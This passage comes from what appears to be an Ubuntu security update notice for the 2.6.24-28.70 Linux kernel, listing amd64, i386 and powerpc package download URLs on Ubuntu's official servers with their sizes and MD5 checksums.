68ff4af3d2752a5d3965eff926890319\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   176414 a2b597847575190f35acc23e2230fee8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   254100 6c70433fbed951cd97797092952efc2b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:  1642020 5664065e58da802295747e9c7c21b698\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   143712 9a418be17d9afe53a5c7add5e90a28b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   164464 325e24198ba529100a5840ae1b0e2550\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   115852 6b155bc2fa1e59e144c57fad46a9acdd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    35060 73537c193f7fa3caf4007cc7348e9d28\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    64402 7760e6acdb5dda4b37ffd2fdd33ae658\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    69710 e6bcf4e9b94aaf83a2fd640e7364a34e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    21596 805227e007ba9dee7f04bf59aafb050c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:     8616 16e18d90244e835d0cbc5ae9c571c641\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    57230 06f30cc1a982671b53e5ca5c8d362aea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   103038 e571751777dc6cdc16f498add459f799\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:  1212558 c1a1947cc4f37c7b1479ece74e399a51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    45496 6f25ee67a63dfc757d82883b8162b268\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    12774 87bfa70fab065ed960c4249106df6219\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   499398 f50e6a5d591d124ea04b8e5c19683404\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    75052 f0253d9acbcf3f06cd0da60e7457c50d\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-openvz_2.6.24-28.70_amd64.deb\n      Size/MD5: 19262374 07ff7910c9e0ae1589fcaf93c1fb8acd\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-rt_2.6.24-28.70_amd64.deb\n      Size/MD5: 17913162 6999b14fbb5cc112d64c9bfcbf475477\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-xen_2.6.24-28.70_amd64.deb\n      Size/MD5: 18914794 a43117499bda8bccd98e185bde493749\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    23686 18bd8e09ccdca0f38c09197958ac5524\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    26796 46c1f483a8ad20c903e6354c68ee3389\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   218826 7a0c579b79c0d53f5d8cb405070c7e38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   220472 70a3539d19ebf9be4e7aed9141f64945\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    51924 ed915e6f13fa7a452e37810ed2589698\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    52058 9c19d0affe1777b36dbcd835e95a72b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    38326 a9041a4039d457f26060784b609ba48c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    39078 393f5a163cbad634e8ba8ff17866e315\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    45994 0b5101e40b38f62278cca75a543f88d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    46166 8a3cd2550f4bc59515ee72f87d40e093\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    83250 4f57f0e75de3e3884c350df0a92646d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    83650 a29ba07db6908cc0dcfc6fa69c5d154f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    32396 e09725b6cd2edb1c99b954931ea30a3d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    32674 74a1c018bdd24a81f56e2f5ca76c86f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   637742 bb0af8a13cbf714fbbe316376f843bbb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   655916 503b7879d411c641f10d813d027e745c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   209854 ff86bb3742203e7bd44a5db87ce40361\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   213616 aa25de1453a8512619d62d66a98c783b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    46562 90e5237cdfc6e54b145b6e13ffdda47d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    47604 a9d621b700d5b56e23025357604f0487\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    62268 e00dd9915a2e92d3b4a7d7908b2194fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    63630 8d854a96bc559b4d87294ece7e79d03c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   130542 2e4009a596d1672486dee5aa3c8b2423\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   137028 da2ceb3ce4e2f0dcfd70cafba0d3eade\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   279082 63e74d6a553fb1725f661340eec544a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   277692 6cad6bee962600c17282346550b40ddd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:  2012888 14bce971d0e20c69df861da2a2b960bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:  2089262 98b4049286d60bfd3473da45ce332991\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-386_2.6.24-28.70_i386.deb\n      Size/MD5:   656922 58714a2e1fcc17e1fd89740aeee114f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-generic_2.6.24-28.70_i386.deb\n      Size/MD5:   659532 f17700bc40e9e3e0d003225207da7c61\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-openvz_2.6.24-28.70_i386.deb\n      Size/MD5:  1244404 a00ae4dde9d6a921b17bda0e2fd86790\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-rt_2.6.24-28.70_i386.deb\n      Size/MD5:  1264690 1e454c5f6a51b34c6f336d69269ba277\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-server_2.6.24-28.70_i386.deb\n      Size/MD5:   661210 385cebd0decb92d51bbea38c77f4ea27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-virtual_2.6.24-28.70_i386.deb\n      Size/MD5:   563854 3806e67c965a034bd8fd0873914baad5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-xen_2.6.24-28.70_i386.deb\n      Size/MD5:  1061360 2a3ad99a1b108041578893878a8637a0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-386_2.6.24-28.70_i386.deb\n      Size/MD5: 18384498 e8f5c0e7addd09241b7ef435a727637a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-generic_2.6.24-28.70_i386.deb\n      Size/MD5: 18402466 0a06a6aad92ccebecf63da2c5966d277\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-server_2.6.24-28.70_i386.deb\n      Size/MD5: 18519954 bf9ef7f9445cfc22787b17d74d8d5900\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-virtual_2.6.24-28.70_i386.deb\n      Size/MD5:  8734136 0a8147e9d7bee6bc870bdc3208279eba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-386_2.6.24-28.70_i386.deb\n      Size/MD5: 25549924 8d030bc507ceb77d0fc6ae4bef22e118\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-generic_2.6.24-28.70_i386.deb\n      Size/MD5: 26364898 875fb60bc5bf8621b97c5574d07e55c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-server_2.6.24-28.70_i386.deb\n      Size/MD5: 27385008 9bec1d2b2b78583fcecedcd5c8ff3960\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-virtual_2.6.24-28.70_i386.deb\n      Size/MD5: 24877718 482b8cef0cf005a8483d11ed3b364964\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_i386.deb\n      Size/MD5:   709188 26cf4f59b5a9cb16b1c5288e9ecbea34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   258828 643f05e4db376d0bf7558133f91a3cfb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   264144 8770cbfb2e0e62965819cc57092f779e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   163268 f173ed5d6f19c886c3e05041e233e310\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   163024 6bb17cdade9c310a5d75eeca5908b7e3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   236736 01de1ba5a354f340f81355f9e7ade04a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   244974 b86f7aaf1e9200b8f4e91d0455f311f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:  1810636 aaf2ac4ebeb43a06da06b3d74abc4029\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:  1827690 3f37ecbc8236e915a23a1c308613910e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   150834 dc34df5d314fbf390ef32a5695e2d4e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   143006 007db1ea88bc4bbf545e989cace61c1e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   156088 f046f30af354e4423fa7f6929efa9cfc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   157156 daa0873f69f4fa6a3e2c6a3f70a98dad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   107216 11c20967c4aba25588cd33e41c62f577\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   108514 6d7f89b2f04c023440977996d99b1a09\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    32952 8f3f5c65701052b71bbcd200e9727d68\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    33384 959583f504cdc92260a2e9cd7f154fba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    60690 46b409f735bcf21fbdcdd069421998bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    61148 2015776c1d327adfa0c00c77d14e7ca8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    82646 498f6209320fef7240940bd2eafe8f91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    82950 f8cd11b646c7b769865e9b0a6e563479\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    48532 fe22024e55539bf9079c05f25651599f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    48460 c070e99c0ec169067c45861ee64e7b00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:     8190 764f83aca8e039670b54ef1bd81bf5c7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:     8438 40dd61311a71fb4f258b651d130fedc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    51108 f788272ef04244c5338f2eb833c68c5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    52946 6a3a99cd19757aa4a7e5bf9bf0cdcdd5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    92156 a595388aea811859919835a4688eeec0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    92430 b1a87544de05790689dedd1408f95825\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:  1443730 ba618401639337ede996442e8d85c657\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:  1426998 8d420db6ebadfd73a40ebb281f29b5e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    43244 264bc9d22f2d87c78d9ec1246b475907\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    42806 f16161dac125195d296c774de1c55ec7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    11404 882437fd9335b261cd2ce699edda462e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    12012 20555d5db134914f14f234201b050957\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   471770 7ea7283725e9fc661d40c780fe6e41a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   473736 ab685d960b7ae1f4397f08dca1e3c00f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    70512 f3a95ca8d7726b950d0145ee38a3c90a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    71380 592677ef1ec0f18ae8ac4704e7f6abb2\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-openvz_2.6.24-28.70_i386.deb\n      Size/MD5: 20246854 551dee4824d56cd54ebd6e2ceed36ce4\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-rt_2.6.24-28.70_i386.deb\n      Size/MD5: 18544608 b047a5db139862e418b7c420e3584e18\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-xen_2.6.24-28.70_i386.deb\n      Size/MD5: 18785694 ab4b0f6acb874628d207503ab96c72a5\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   334050 cb0a2732f7d57db2d4cf0aff024b0742\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   318522 845ff20c4f352d9accc1809e99f8a1a6\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    62720 da2d0022028e792d039fe638a6e511b2\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    73010 505d3154aa77be5a0e1ad64dfd6ae565\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    41444 0358500eff1aa734aa460223cffbd6fe\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    47828 41d9d6981ea0fb6efb885530e55d229a\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    89502 13e293ff0eeef8f0a25532cbc1f6c59e\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   105748 0276e7fc8215525f00c10d0d78729e74\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    44828 a6ad64ce75120444ae7f77eb185f8341\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    40932 b70c6c4ee3bad7a338ef382e8a3cdc13\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   704802 2482fd05dab21510ca1d1cb12255f28d\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   771068 65cf59f3797041350a9066d561c0e064\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   243302 dafec4c170c159b89196ce5a1b3728c1\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   246242 3efe238d1ffb86bb475953cceb77ed8a\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    69164 d97c8f78522a9bdc7b19f9d9eddef075\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   132596 1e4fd78863d1c805c3fbfef2adabc1cf\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    70242 46c97ad3a53ccee9e557521ef833ade4\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    77458 a7d9a6a35e41c3a8e7552471f78f2de6\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   146272 074f4acf53ffc60e19b36d4360a6872f\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   165012 02994ab52ccb8b88c8a85954c04c214a\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   388012 3d1d5851c82d9b38f7764a2183ec6b72\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   350478 d5c91796ae6b0f20f52cab3328f9b233\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:  2431708 6b69540ac9168a1068af1c829e6ad807\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:  3474134 efd7274967d4c93a4b4f757b8b663f1b\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc-smp_2.6.24-28.70_powerpc.deb\n      Size/MD5:   654288 16629f59f727a0d5d1ce1a2f178fdbdc\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc64-smp_2.6.24-28.70_powerpc.deb\n      Size/MD5:   659270 3acd9fa19531e93a19b79b92946742fe\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc_2.6.24-28.70_powerpc.deb\n      Size/MD5:   654194 19fb231dfad96a5202c96e0a963608a6\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc-smp_2.6.24-28.70_powerpc.deb\n      Size/MD5: 20175768 245a4d510c48479ca8608d064bb4d0f1\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc64-smp_2.6.24-28.70_powerpc.deb\n      Size/MD5: 21380060 4c2463eeb9eec0f53a8336ffea5d2f37\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc_2.6.24-28.70_powerpc.deb\n      Size/MD5: 19950242 58918c61f50c52423dde5bb0cfea337e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_powerpc.deb\n      Size/MD5:   699320 f121a6d0897b8a3e3570355ad721475f\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   266748 96cc9a56b70590f6ef9cb4f42abd9f4c\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   307734 2a8ec116cdc2b993d54831e547d3cfe4\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   192248 ae395f02a06c83624393880a1c8bc755\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   201694 0523582031686284be72e9516eb874ed\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   272066 97f5240c866f23e18620876700e08bd5\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   306006 a09ded2fdc08a8b4fd286d5a732de719\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:  1807806 f968364fcce3f3e06fe0229f9ad00400\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:  2119512 8826a9667e0813ad11f13ef49ed0c9ba\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   235184 4d42dbe3fee5610fefc492c84f82f01d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   